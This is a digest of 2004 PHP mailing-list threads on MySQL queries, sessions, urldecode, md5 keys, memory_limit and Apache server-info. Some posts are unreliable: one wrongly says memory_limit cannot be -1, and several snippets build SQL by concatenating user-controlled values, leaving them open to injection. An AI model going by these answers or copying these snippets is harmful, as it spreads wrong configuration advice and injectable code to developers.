[PHP] Re: Close all open tags in HTML text

[Daniel Schierbeck]

Matt Palermo wrote:
I am allowing users to imput HTML code into a textarea.  After they input 
this, I wany to output their HTML to the browser.  In order for the document 
to be safe, I need to close all open HTML tags that have been left open by 
the user, along with any open comments.  Is there a way to take an HTML 
string and add closing tags and comments to it if needed?

Thanks,
Matt 
I would use a regular expression to grab the valid opening and closing 
HTML tags, and use something á la htmlentities() on the rest of the 
document.

--
Daniel Schierbeck
Help spread Firefox (www.getfirefox.com): 
http://www.spreadfirefox.com/?q=user/register&r=6584

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] MYSQL Query question

[Reinhart Viane]

Table chat_online:
session (varchar)
activity (datetime)
 
Table persons
persons_region_int(int)
 
Table regions
region_id
region_name
 
On a page i list all persons which are in the chat_online dbase and
within a certain period:
$limit_time = time() - 130; // 2 Minutes time out. 60 * 2 = 120 
$sqlchatonline = "SELECT * FROM chat_online WHERE
UNIX_TIMESTAMP(activity) >= $limit_time AND
(sessionid!='".session_id()."')";
$resultchatonline=mysql_query($sqlchatonline) or die (mysql_error());
$chatvisits = mysql_num_rows($resultchatonline);
 
while($rowchatonline = mysql_fetch_object($resultchatonline)){
   $chattersessionid=$rowchatonline->sessionid;
   //get the username, userid, mainpicid from the online chatter
   $getinfo= "select * from persons where
person_session_id='$chattersessionid'";
   $resultgetinfo = mysql_query($getinfo) or die (mysql_error());
   $rowgetinfo= mysql_fetch_array($resultgetinfo);
echo $rowgetinfo['person_nick'];
}
 
Now i want these online chatters to be listed by person_region_int:
something like:
region A
chatter1
chatter2
region B
none
region C
chatter3
chatter4
 
How do i do this?
 
And a second question:
I have created a menu box which lists all regions, if a option is
selected by the user, i only want to show the online chatters of the
selected region (selecting an option defines a variable $region which
holds the region_id)
Something like:
if ($region) {
$sqlchatonline = "SELECT * FROM chat_online, persons WHERE
UNIX_TIMESTAMP(chat_online.activity) >= $limit_time AND
(chat_online.sessionid!='".session_id()."' AND
(persons.persons_region_int='$region')";
}
 
This doe not give me the correct result: it shows all online chatters *
total amount of users of that region. It should be all online chatters
from that specified region
 
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache whens earching something. Does someone know a good
mysql manual site or a good mysql book?
 
Thx in advance
Reinhart
 
  _  

Reinhart Viane 
  [EMAIL PROTECTED] 
Domos || D-Studio 
Graaf Van Egmontstraat 15/3 -- B 2800 Mechelen -- tel +32 15 44 89 01 --
fax +32 15 43 25 26 


STRICTLY PERSONAL AND CONFIDENTIAL 
This message may contain confidential and proprietary material for the
sole use of the intended 
recipient.  Any review or distribution by others is strictly prohibited.
If you are not the intended 
recipient please contact the sender and delete all copies.

 

Re: [PHP] ini_set doesn't work

[Thomas Munz]

your set it to '-1'!!!

thats not allowed. You must habe a value highter than zero. Its better you set 
it in generall to 60. And you forgot the 'M' fater the number like

 ini_set("memory_limit","-1M");

set it better to that:
ini_set("memory_limit","60M");


> hello,
>
> what do I have to change in php.ini, to allow thr
> ini_set("memory_limit",-1);
> command?
>
> It doesn't work in my script...
>
> regards
> Joerg

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Need shipping info

[suneel]

Hi guys...

Here I'm using a UPS service

Could any one tell what sort details we have to consider in the 
database 
while shipping the products to the shipment gateway

thanks & regards,
Suneel

[PHP] PHP4 mysqli with mysql 4.1.7?

[Francis Mak]

Hi,

This message is a bit long, but I hope somebody could help me on this issue,
thank you .

I am using mysql 4.1.0(default-character-set=utf8) with PHP 4.3.3.  All
tables are using utf8 charset.
I can insert, select and display the utf8 character without any problem
using PHP, I used the normal mysql_query operation, NOT mysqli.  Yes,
msqyl_query works well in 4.1.0.

Now, I upgraded to 4.1.7(default-character-set=utf8).  I use mysql client
and I can see all data in 4.1.7 are utf8.  However, PHP shows all as ???.
>SHOW VARIABLES LIKE '%charset%'
>character_set_server  utf8
>character_set_system  utf8
>character_set_database  utf8
>character_set_client  utf8
>character_set_connection utf8
>character_set_results  utf8
>collation_connection  utf8_general_ci
>collation_database  utf8_general_ci
>collation_server  utf8_general_ci

I struggled for a few days and finally discovered a message in mysql-lists
by Marek Lewczuk(UTF-8 problem, 24/5/2004), he has the follwing in his PHP
script:

mysqli_query($c, "SET CHARACTER SET utf8;");
mysqli_query($c, "SELECT * FROM db");

I have never used mysqli before, and I found it is only avaliable in PHP5.

I have several questions to ask:

1. Can I compile PHP4 with mysqli extention?  Is there any tricks to do
this?
2. Why mysql 4.1 + mysqli is recommended?  But not the normal mysql
extention?
3. If I upgrade to mysql 4.1.7 + PHP5, I need to rewrite all of my
application to use mysqli instead of mysql?  Any advise on this issue?
4. I see that we must use mysqli_query($c, "SET CHARACTER SET utf8;");
before any query, can I compile the mysqli extention to use utf8 as default?
5. In http://www.php.net/manual/en/ref.mysql.php I see a note: " If you need
charsets other than latin (default), you have to install external (not
bundled) libmysql with compiled charset support. "  So, it means it is
possible to use mysql_query to with utf8?
6. Any reason why I can use mysql_query with 4.1.0 without any problem?

I know there are many questions, but I hope somebody could help me.  And I
believes there are lots of people having the same upgrade issue.
if utf8 + 4.1.7 + mysqli_query is a must instead of 4.1.7 + mysql_query, I
am sure that there will be lots of problem come up as most PHP applications
are using mysql_query only.

THANK YOU VERY MUCH!!!

Francis Mak

[PHP] Objects and sessions

[Francisco M. Marzoa Alonso]

Following code:

class SessionTestC {
   protected $value;
   function __construct ( $val ) {
   $this->value = $val;
   }
   function GetValue () {
   return $this->value;
   }
}
if ( isset ($_SESSION['TestObj'])) {
   echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'';
} else {
   session_start ();
   echo 'Session Test was not set.';
   $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
   echo "Click here.";
}
?>
Gives me an error of incomplete object on second access, like this:
*Fatal error*: main() [function.main 
]: The script tried to 
execute a method or access a property of an incomplete object. Please 
ensure that the class definition "SessionTestC" of the object you are 
trying to operate on was loaded _before_ unserialize() gets called or 
provide a __autoload() function to load the class definition in 
*/home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php* on line *16

*But as it can be seen, the class is defined in the script 
SessionTest.php itself, so... ??

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: mail with attachment

[Dre]

I did not try it yet .. but I will

"Manuel Lemos" <[EMAIL PROTECTED]> wrote in message
news:[EMAIL PROTECTED]
> Hello,
>
> Dre wrote:
>  > Thanks Manuel, I will check the class
>  >
>  > and here is the code of the mail sending script
>  > //==
>  >   >   $att_name = $_POST['att'];
>  >   echo $att_name;
>  >   $att_size = filesize($att_name);
>  >   $handle= fopen($att_name, "r");
>  >   $file = fread($handle, $att_size);
>
> You need to open the file as binary but I do not think that could cause
> the problem that you described. Did you try the class that I mentioned?
> Did it work?
>
> -- 
>
> Regards,
> Manuel Lemos
>
> PHP Classes - Free ready to use OOP components written in PHP
> http://www.phpclasses.org/
>
> PHP Reviews - Reviews of PHP books and other products
> http://www.phpclasses.org/reviews/
>
> Metastorage - Data object relational mapping layer generator
> http://www.meta-language.net/metastorage.html

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Close all open tags in HTML text

[Robin Vickery]

On Wed, 8 Dec 2004 22:33:19 -0500, Matt Palermo <[EMAIL PROTECTED]> wrote:
> I am allowing users to imput HTML code into a textarea.  After they input
> this, I wany to output their HTML to the browser.  In order for the document
> to be safe, I need to close all open HTML tags that have been left open by
> the user, along with any open comments.  Is there a way to take an HTML
> string and add closing tags and comments to it if needed?

You might want to look at the html tidy functions for tidying and
repairing html:

   http://www.php.net/manual/en/ref.tidy.php

  -robin

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Question: urldecode

[Stuart Felenstein]

In my search page, the url returned comes back with
the ..err I forget what it's called, but query string
looks like this: %5B%5D=3.  I think the %5B and 5D
should be [].

What I think is needed is rawurldecode.  I've looked
through my code and think it belongs somewhere in this
block:

$queryString_rsVJ = "";
if (!empty($_SERVER['QUERY_STRING'])) {
  $params = explode("&", $_SERVER['QUERY_STRING']);
  $newParams = array();
  foreach ($params as $param) {
if (stristr($param, "pageNum_rsVJ") == false && 
stristr($param, "totalRows_rsVJ") == false) {
  array_push($newParams, $param);
}
  }
  if (count($newParams) != 0) {
$queryString_rsVJ = "&" .
htmlentities(implode("&", $newParams));
  }
}

would doing something like this make sense?:

$queryString_rsVJ = "&" .
htmlentities(rawurldecode(implode("&", $newParams)));

Feedback appreciated.

Thank you 
Stuart

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] duplicate md5 hash's

[Richard Davey]

Hello Guy,

Thursday, December 9, 2004, 11:39:27 AM, you wrote:

GB> $hash = md5(uniqid($message));

GB> where message is a string that the user will input.

GB> How likely is it that this hash might be repeated?

GB> I'm using the hash as a primary key in a database - the user gets sent
GB> the hash as part of a url to retrieve the details of that database row.

GB> (its a basic send to a friend e-card system).

GB> Is there any way that the same hash could have been generated more than
GB> once?

It's extremely unlikely (I cannot give you any stats as to how
unlikely though, sorry).

However why not just stick the $hash creation into a self-checking
loop. I.e. make the hash - check the database - does it exist already?
- If not then the hash is good, else repeat the process. Using uniqid
will give you a unique hash on each occasion so this process
shouldn't take very long at all even if it did find a duplicate a few
times (unlikely!)

Best regards,

Richard Davey
-- 
 http://www.launchcode.co.uk - PHP Development Services
 "I am not young enough to know everything." - Oscar Wilde

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] [SOLUTION] Re: [PHP] Objects and sessions

[Francisco M. Marzoa Alonso]

Thomas Munz wrote:
I think, its not possible to init an Objeect on a session. 

Yes, it can.
The problem was with serialization. With session.auto_start set to 1 on 
php.ini, seems like session's objects are unserialized before loading 
the script, so the class is not loaded when the session unserialized the 
object, and therefore it fails to unserialize it as an instance of its 
class.

Setting session.auto_start to 0 on php.ini you should take care of 
resume sessions calling session_start() each time, but you can put that 
call after class definition, so the object will be unserialized after, 
so the problem is solved.

This code works fine:

class SessionTestC {
   protected $value;
   function __construct ( $val ) {
   $this->value = $val;
   }
   function GetValue () {
   return $this->value;
   }
}
if ( isset ($_GET['close_session'])) {
   unset ($_SESSION);
   session_start ();
   session_destroy ();
}
session_start ();
if ( isset ($_SESSION['TestObj'])) {
   echo 'TestObj is an instance of 
'.get_class($_SESSION['TestObj']).'';
   echo '';
   print_r ($SESSION['TestObj']);
   echo '';

   echo "Close 
session.";
   echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'';
} else {
   echo 'Session Test was not set.';
   $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
   echo "Click here.";
}

?>
BTW, I do not know if the code I've used to destroy the session is the 
best, but this is a secondary issue...

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] allow_url_fopen ini directive not enough

[Kelvin Jones]

Hi,
I would like to see a new directive to go alongside "allow_url_fopen" to
allow people to turn on or off the ability to include/require a remote file.
The ability to include and execute a file as php from a remote host
leaves many applications open to cross-site-scripting attacks.
This would be easily avoidable if we had a directive
(allow_url_include?) that by default removed this capability.
Any thoughts?
Kelvin
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] duplicate md5 hash's

[Guy Bowden]

Hi,
I know this is highly unlikely... but I have this code:
$hash = md5(uniqid($message));
where message is a string that the user will input.
How likely is it that this hash might be repeated?
I'm using the hash as a primary key in a database - the user gets sent 
the hash as part of a url to retrieve the details of that database row.

(its a basic send to a friend e-card system).
Is there any way that the same hash could have been generated more than 
once?

Cheers,
Guy
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] duplicate md5 hash's

[Guy Bowden]

Thanks for the tip... I have now implemented a while loop to make sure 
that it goes into the db, as you say this should never actually loop, 
but if it does it should only loop once..

kind of extra security..
cheers
Richard Davey wrote:
Hello Guy,
Thursday, December 9, 2004, 11:39:27 AM, you wrote:
GB> $hash = md5(uniqid($message));
GB> where message is a string that the user will input.
GB> How likely is it that this hash might be repeated?
GB> I'm using the hash as a primary key in a database - the user gets sent
GB> the hash as part of a url to retrieve the details of that database row.
GB> (its a basic send to a friend e-card system).
GB> Is there any way that the same hash could have been generated more than
GB> once?
It's extremely unlikely (I cannot give you any stats as to how
unlikely though, sorry).
However why not just stick the $hash creation into a self-checking
loop. I.e. make the hash - check the database - does it exist already?
- If not then the hash is good, else repeat the process. Using uniqid
will give you a unique hash on each occasion so this process
shouldn't take very long at all even if it did find a duplicate a few
times (unlikely!)
Best regards,
Richard Davey
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Objects and sessions

[Thomas Munz]

I think, its not possible to init an Objeect on a session. Session will be 
rebuild on each reload of the site based on the session id, i think...

Maybe here the object can't be rebuild anymore...
> Following code:
>
> 
> class SessionTestC {
> protected $value;
>
> function __construct ( $val ) {
> $this->value = $val;
> }
>
> function GetValue () {
> return $this->value;
> }
> }
>
> if ( isset ($_SESSION['TestObj'])) {
> echo 'Session Test is set to:
> '.$_SESSION['TestObj']->GetValue().''; } else {
> session_start ();
> echo 'Session Test was not set.';
> $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
> echo "Click
> here."; }
>
> ?>
>
> Gives me an error of incomplete object on second access, like this:
>
> *Fatal error*: main() [function.main
> ]: The script tried to
> execute a method or access a property of an incomplete object. Please
> ensure that the class definition "SessionTestC" of the object you are
> trying to operate on was loaded _before_ unserialize() gets called or
> provide a __autoload() function to load the class definition in
> */home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php* on line *16
>
> *But as it can be seen, the class is defined in the script
> SessionTest.php itself, so... ??

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] best practice question..

[Guy Bowden]

On this note - what is considered "best practice" in a - sent to friend 
type thing.

i.e. User inputs their name + message + email + friends email into a 
html/flash form

friend gets a link to read the message.
currently I do this:
1 collect form input
2 create hash using the md5/uniqid method : $hash = md5(uniqid($key));
3 input data to database table using the hash as the primary key value
4 send email to friend with link containing the hash
5 user clicks on link
6 hash read in from the $_GET object
7 hash used to select message details from DB and displayed to the user
There's never a security issue here - i.e. i don't mind how many times / 
who reads the message, but just want to make it hard to just guess keys 
to read other messages (otherwise it would just be the db id)

This method works for me, but is it the *right* way?
Thanks for any input
Cheers,
Guy
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Need shipping info

[John Nichel]

suneel wrote:
Hi guys...
Here I'm using a UPS service
Could any one tell what sort details we have to consider in the database 
while shipping the products to the shipment gateway

thanks & regards,
Suneel
You might want to consider asking a php question.

adds UPS to the list of things covered by the php-general list

--
By-Tor.com
...it's all about the Rush
http://www.by-tor.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] best practice question..

[Richard Davey]

Hello Guy,

Thursday, December 9, 2004, 12:34:03 PM, you wrote:

GB> There's never a security issue here - i.e. i don't mind how many times /
GB> who reads the message, but just want to make it hard to just guess keys
GB> to read other messages (otherwise it would just be the db id)

GB> This method works for me, but is it the *right* way?

There's no right or wrong way to do this - if it works for you, then
it works :)

The only thing I would strongly suggest is a check somewhere - if the
recipient has been sent an email already (perhaps within the last 30
days?) then you don't send them another one.

That way you're not open to being a spam bot.

Best regards,

Richard Davey
-- 
 http://www.launchcode.co.uk - PHP Development Services
 "I am not young enough to know everything." - Oscar Wilde

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Question: urldecode

[Ford, Mike]

To view the terms under which this email is distributed, please go to 
http://disclaimer.leedsmet.ac.uk/email.htm



> -Original Message-
> From: Stuart Felenstein [mailto:[EMAIL PROTECTED] 
> Sent: 09 December 2004 11:52
> 
> In my search page, the url returned comes back with
> the ..err I forget what it's called, but query string
> looks like this: %5B%5D=3.  I think the %5B and 5D
> should be [].

Are you seeing the URL-encoded version *only* in your browser's
Address/Location bar?  If so, that's perfectly normal and nothing to worry
about -- it should be automatically decoded by the Web server before being
passed to PHP.

If you're seeing the encoded version actually in your PHP script, that
sounds like a major problem, possibly indicating a missing urldecode() or
extraneous urlencode() -- in which case, please post a more detailed
analysis of your problem, examples of the unwanted behaviour, and the
relevant portions of script.

Cheers!

Mike

-
Mike Ford,  Electronic Information Services Adviser,
Learning Support Services, Learning & Information Services, JG125, James
Graham Building, Leeds Metropolitan University, Headingley Campus, LEEDS,
LS6 3QS,  United Kingdom
Email: [EMAIL PROTECTED]
Tel: +44 113 283 2600 extn 4730  Fax:  +44 113 283 3211

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] MYSQL Query question

[Raditha Dissanayake]

Reinhart Viane wrote:
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache whens earching something. Does someone know a good
mysql manual site or a good mysql book?
 

That does not mean mysql questions should be posted on php mailing lists.

STRICTLY PERSONAL AND CONFIDENTIAL 
This message may contain confidential and proprietary material for the
sole use of the intended 
recipient.  Any review or distribution by others is strictly prohibited.
If you are not the intended 
recipient please contact the sender and delete all copies.
 

Do you know that mailing lists are automatically archived at thousands 
of websites?


 


--
Raditha Dissanayake.
--
http://www.radinks.com/print/card-designer/ | Card Designer Applet
http://www.radinks.com/upload/  | Drag and Drop Upload 

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] MYSQL Query question

[Reinhart Viane]

First, since it was a combined question of php and mysql I thought of
sending it here.
Secondly, this is my standard footer.

My appologizes if my question irritates you


-Original Message-
From: Raditha Dissanayake [mailto:[EMAIL PROTECTED] 
Sent: donderdag 9 december 2004 14:14
To: [EMAIL PROTECTED]
Subject: Re: [PHP] MYSQL Query question


>Reinhart Viane wrote:

>And a last question:
>I always seem to get stuck on mysql queries when scripting. mysql.com 
>gives me a headache whens earching something. Does someone know a good 
>mysql manual site or a good mysql book?
>  
>
>That does not mean mysql questions should be posted on php mailing
lists.

> 
>
>
>STRICTLY PERSONAL AND CONFIDENTIAL
>This message may contain confidential and proprietary material for the
>sole use of the intended 
>recipient.  Any review or distribution by others is strictly
prohibited.
>If you are not the intended 
>recipient please contact the sender and delete all copies.
>  
>
>Do you know that mailing lists are automatically archived at thousands 
>of websites?

> 
>
>  
>


-- 
Raditha Dissanayake.
--
http://www.radinks.com/print/card-designer/ | Card Designer Applet
http://www.radinks.com/upload/  | Drag and Drop Upload 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Question: urldecode

[Stuart Felenstein]

--- "Ford, Mike" <[EMAIL PROTECTED]> wrote:

> Are you seeing the URL-encoded version *only* in
> your browser's
> Address/Location bar?  If so, that's perfectly
> normal and nothing to worry
> about -- it should be automatically decoded by the
> Web server before being
> passed to PHP.

> 
> If you're seeing the encoded version actually in
> your PHP script, that
> sounds like a major problem, possibly indicating a
> missing urldecode() or
> extraneous urlencode() -- in which case, please post
> a more detailed
> analysis of your problem, examples of the unwanted
> behaviour, and the
> relevant portions of script.
> 
I have no idea about what it means to see the encoded
version in my script. I have only one urldecode in the
script:



No urlencodes anywhere. 
I'll assume it's decoded properly before going to php
because the script runs fine.  I just know that I've
seen the hex's normally converted in the browser bar.

Further, I was assuming I should add the urldecode to
the query string.  As I had posted originally.  From
the example in the manual it appears I might to pass
the params through a urldecode counter loop.  

Lastly, I wasn't concerned about the hex code, but I
just made some reconnections of scripts.  Users can
save their search parameters.  I am saving the query
string.  Now I had this set up before and the way it
"was" working , is when the user wanted to view or
edit their saved searches, the search page would come
back with all the parameters filled in including
shaded parameters in things like mult select lists and
menu dropdowns.  It's not working that way now , so my
first suspicion is perhaps the hex is effecting it.

I can post more of the script if that makes sense.

Stuart

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: Objects and sessions

[Shen Kong]

Hi, your code my be this , you must use session_start() first:

   function __construct ( $val ) {
   $this->value = $val;
   }
   function GetValue () {
   return $this->value;
   }
}
if ( isset ($_SESSION['TestObj'])) {
   echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'';
} else {
   echo 'Session Test was not set.';
   $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
   echo "Click here.";
}
?>
Francisco M. Marzoa Alonso wrote:
Following code:

class SessionTestC {
   protected $value;
   function __construct ( $val ) {
   $this->value = $val;
   }
   function GetValue () {
   return $this->value;
   }
}
if ( isset ($_SESSION['TestObj'])) {
   echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'';
} else {
   session_start ();
   echo 'Session Test was not set.';
   $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
   echo "Click here.";
}
?>
Gives me an error of incomplete object on second access, like this:
*Fatal error*: main() [function.main 
]: The script tried to 
execute a method or access a property of an incomplete object. Please 
ensure that the class definition "SessionTestC" of the object you are 
trying to operate on was loaded _before_ unserialize() gets called or 
provide a __autoload() function to load the class definition in 
*/home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php* on line *16

*But as it can be seen, the class is defined in the script 
SessionTest.php itself, so... ??

--
-- ShenKong ([EMAIL PROTECTED])
-- http://www.openphp.cn
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] a question about the PHP manual

[Eakin, W]

Hello,
   As I'm studying, and learning, PHP, I use certain resources again 
and again. A few books I've bought, some web sites, this mailing list, 
and the PHP manual. I've taken the often repeated 'RTFM' to heart, and I 
attempt to google or RTFM before considering a post to the list with a 
question, but now I have a question about the manual itself.
I've noticed that most of the replies to the questions on this list, 
when they refer to a part of the manual,  point to the same few sections 
over and over. Such as arrays, strings, sessions, objects, and a few others.
My question is this, when I'm reading the manual, is just that I should 
be concentrating on a few sections (and if so, which?), or should I be 
giving equal attention to all the sections, including some (I suppose) I 
might never use.

Thoughts?
thanks,
William
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: Installing Apache and PHP from scratch

[Don]

> Hi,
>  
> Have been using RedHat and Fedora Systems.  When I install the OS, Apache
> is
> usually installed already and I download PHP and install manually.  I'd
> like
> to install Apache itself but not sure what configuration to use.  Is there
> a command similar to the phpinfo() command that can tell me how an already
> installed Apache in configured?

Enable server-info in your httpd.conf and be amazed at the amount of
information http;//localhost/server-info will chuck at you.


 
How exactly does this work?
 
1. In my httpd.,conf file< i uncommented teh following lines:

SetHandler server-info
Order deny,allow
Deny from all
Allow from .lclnav.com

 
2.  I then restarted my apache server
 
3.  I then type in the location bar: HYPERLINK
"http://www.lclnav.com/server-info"http://www.lclnav.com/server-info
 
I get (doesn't work):
 
"Forbidden
You don't have permission to access /server-info on this server."
 
Note: I created the directory 'server-info' off of the directory root after
the error; still errors

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.807 / Virus Database: 549 - Release Date: 12/7/2004
 

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Question: urldecode

[Ford, Mike]

To view the terms under which this email is distributed, please go to 
http://disclaimer.leedsmet.ac.uk/email.htm



> -Original Message-
> From: Stuart Felenstein [mailto:[EMAIL PROTECTED] 
> Sent: 09 December 2004 13:38
> 
> --- "Ford, Mike" <[EMAIL PROTECTED]> wrote:
> 
> > Are you seeing the URL-encoded version *only* in
> > your browser's
> > Address/Location bar?  If so, that's perfectly
> > normal and nothing to worry
> > about -- it should be automatically decoded by the
> > Web server before being
> > passed to PHP.
> 
> > 
> > If you're seeing the encoded version actually in
> > your PHP script, that
> > sounds like a major problem, possibly indicating a
> > missing urldecode() or
> > extraneous urlencode() -- in which case, please post
> > a more detailed
> > analysis of your problem, examples of the unwanted
> > behaviour, and the
> > relevant portions of script.
> > 
> I have no idea about what it means to see the encoded
> version in my script. I have only one urldecode in the
> script:
> 
> 

I actually doubt whether you even need this urldecode() -- but it depends
where that value is coming from.

> Further, I was assuming I should add the urldecode to
> the query string.

I don't quite understand this -- if you mean the query string supplied to
your script and manifesting in your $_GET array, then no, very unlikely,
since this should have been taken care of by the Web server before it gets
anywhere near PHP.  If you're referring to echoing out URLs with query
strings on them, then that is one of the few instances where urlENcode()
might be necessary, but definitely not urlDEcode().

> Lastly, I wasn't concerned about the hex code, but I
> just made some reconnections of scripts.  Users can
> save their search parameters.  I am saving the query
> string.  Now I had this set up before and the way it
> "was" working , is when the user wanted to view or
> edit their saved searches, the search page would come
> back with all the parameters filled in including
> shaded parameters in things like mult select lists and
> menu dropdowns.  It's not working that way now , so my
> first suspicion is perhaps the hex is effecting it.

All I can say to this is to re-iterate the point that your Web server should
be decoding those %xx values before your script ever gets to see them.  You
*may* have to urlencode() values you write out that might one day form part
of a clickable link -- but, because of the previous sentence, you should not
yourself need to do the compensating urldecode() in the target script.

Once again, this sounds like a situation where you need to be echoing out
everything and anything of even the slightest relevance at the crucial spots
of your script -- in the debugging phase, my scripts often have a bunch of
debugging echoes every few lines, and some sections even end up with more
temporary echoes than actual script!  It's tedious wading your way through
the screenfuls of output, but can be exceedingly illuminating of an elusive
problem.

Cheers!

Mike

-
Mike Ford,  Electronic Information Services Adviser,
Learning Support Services, Learning & Information Services, JG125, James
Graham Building, Leeds Metropolitan University, Headingley Campus, LEEDS,
LS6 3QS,  United Kingdom
Email: [EMAIL PROTECTED]
Tel: +44 113 283 2600 extn 4730  Fax:  +44 113 283 3211

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] MYSQL Query question

[John Nichel]

Raditha Dissanayake wrote:
Reinhart Viane wrote:
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache whens earching something. Does someone know a good
mysql manual site or a good mysql book?
 

That does not mean mysql questions should be posted on php mailing lists.

There you go again, trying to keep this list on topic. ;)
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: Installing Apache and PHP from scratch

[Jason Wong]

On Thursday 09 December 2004 22:12, Don wrote:

> 1. In my httpd.,conf file< i uncommented teh following lines:
> 
> SetHandler server-info
> Order deny,allow
> Deny from all
> Allow from .lclnav.com
> 

That "Allow from ..." has to specify an IP address / network range / domain 
(etc) that will allow your *client* to connect.

If you have shell access on the server and you have lynx/links/elinks 
installed then you should probably only "Allow from 127.0.0.1" and just 
access it directly from the server rather than through a remote client.

> Note: I created the directory 'server-info' off of the directory root after
> the error; still errors

You don't need to create any directories for the above to work.

As this is not PHP-related if you need more info refer to the Apache docs 
and/or ask on the Apache mailing list.


-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
BOFH Excuse #116:

the real ttys became pseudo ttys and vice-versa.
*/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] a question about the PHP manual

[Miles Thompson]

At 09:56 AM 12/9/2004, Eakin, W wrote:
Hello,
   As I'm studying, and learning, PHP, I use certain resources again and 
again. A few books I've bought, some web sites, this mailing list, and 
the PHP manual. I've taken the often repeated 'RTFM' to heart, and I 
attempt to google or RTFM before considering a post to the list with a 
question, but now I have a question about the manual itself.
I've noticed that most of the replies to the questions on this list, when 
they refer to a part of the manual,  point to the same few sections over 
and over. Such as arrays, strings, sessions, objects, and a few others.
My question is this, when I'm reading the manual, is just that I should be 
concentrating on a few sections (and if so, which?), or should I be giving 
equal attention to all the sections, including some (I suppose) I might 
never use.

Thoughts?
thanks,
William

Well, those are commonly used parts of the language, along with control 
structures (IF, WHILE, CASE).

Once PHP is installed, familiarity with Chapters 10 through 42 would 
furnish a really solid grounding.

Then I'd look at the function list and focus on the functions applicable to 
your particular database and the error handling and logging functions.

After that, it depends on your programming experience, as how one thinks in 
language "a" may be subtly different language "b". Note that there are both 
directory and file system functions; the separation is logical, but sent me 
on a worried hunt a couple of years ago. Thus we reach the land of "it 
depends on what you want or have to do".

In closing, I'd recommend writing little test scripts so that you can do 
two things:
1. Figure out how to use the various functions and how they behave.
2. Then intentionally break them - knowledge of this behaviour can 
be just as important.

Alternately, like many, dig out the info as it's needed. The problem with 
this approach is missing out on new and better ways of doing things, and 
you don't enrich your toolkit. As for "some (I suppose) I might never use" 
- just how much time do you WANT to spend with your computer? How do the 
others in your life feel about that?

Cheers - Miles
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] a question about the PHP manualB

[Ron Clark]

At 09:56 AM 12/9/2004, Eakin, W wrote:
>Hello,
>As I'm studying, and learning, PHP, I use certain resources again and
> again. A few books I've bought, some web sites, this mailing list, and
> the PHP manual. I've taken the often repeated 'RTFM' to heart, and I
> attempt to google or RTFM before considering a post to the list with a
> question, but now I have a question about the manual itself.
>I've noticed that most of the replies to the questions on this list, when
>they refer to a part of the manual,  point to the same few sections over
